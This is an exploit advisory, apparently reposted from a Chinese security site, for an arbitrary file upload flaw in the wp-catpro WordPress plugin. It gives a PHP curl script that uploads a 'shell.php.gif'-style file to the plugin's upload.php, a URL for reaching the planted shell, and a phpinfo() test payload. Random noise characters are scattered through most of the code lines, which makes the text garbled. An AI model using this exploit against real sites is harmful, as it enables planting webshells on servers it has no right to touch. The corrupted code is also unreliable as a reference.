WordPress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif（扩展名白名单似乎只检查最后一个扩展名，因此该文件名能通过下面的 jpg/gif/png 检查；上传的文件是否会被当作 PHP 执行，取决于 Web 服务器对多重扩展名的处理配置）
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
0 y9 p) l7 [6 }6 R- H: R" ^<?php- F' D! R0 R! l5 D, Z
' @; M0 J( i; E1 x+ W- O
$uploadfile="zik.php.gif";
& O$ I7 x( X; \3 T/ C$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");" V8 q9 B5 O& G' x
curl_setopt($ch, CURLOPT_POST, true);
4 p9 }8 L! N) l4 f1 Dcurl_setopt($ch, CURLOPT_POSTFIELDS,4 T# t2 Z/ K3 ^1 D" I2 c/ G
array('Filedata'=>"@$uploadfile",
" _' M @9 F. ]. _'folder'=>'/wp-content/uploads/catpro/')); J2 K: k/ m) h& R# W; X* O% A
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ |0 ], z- x5 s7 h& Z( s# O& B$postResult = curl_exec($ch);, ^4 r0 L; ]( `; X
curl_close($ch);
# P; Y: v8 a, V! V5 o( }6 z
/ o/ c$ z0 Z( \print "$postResult";2 ^" @0 ^4 L& S4 w$ ^
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
0 R' }. Q3 P' Y ?>
/ E, T1 |* c# z3 T- M<?php+ F; ^$ v: A. T! V
phpinfo();
6 i+ q# w' A/ k7 [' `$ Y?> |